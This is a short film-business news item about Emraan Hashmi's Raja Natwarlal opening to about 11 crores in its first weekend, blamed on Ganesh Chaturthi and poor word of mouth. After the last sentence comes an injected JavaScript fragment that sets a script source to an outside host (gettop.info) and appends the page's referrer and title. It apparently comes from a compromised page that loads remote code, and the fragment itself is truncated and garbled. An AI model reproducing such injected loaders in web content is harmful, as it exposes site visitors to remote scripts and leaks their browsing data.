Critics must have praised Emraan Hashmi’s Raja Natwarlal, but for some reason, no one’s watching it. The box office collection of Raja Natwarlal for the first weekend which fall far behind what was predicted are evidence of just that!
The box office collections summed up to a mere 11 crores for the first weekend despite it getting released in nearly 2000 theatres all across the country. It was made with a budget of 35 crores and the makers are praying that the collections cross a 20 crore by the end of the first week.
And meanwhile when we try and find out what the reason behind Raja Natwarlal’s damp business could be, the reasons are not very hard to fathom. The major reason being that the Ganesh Chathurthi fell on the release day and what with it being a largely celebrated festival, not many would’ve been enthusiastic to leave their celebrations and go watch a movie instead. And then there was this bad publicity that the movie had about it being dull and boring and Emraan Hashmi and Humaima Malik’s chemistry not working out all that well.
Since there is nothing except Mardaani to compete with it, there is a good chance that the Raja Natwarlal collections could pick up this week.}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
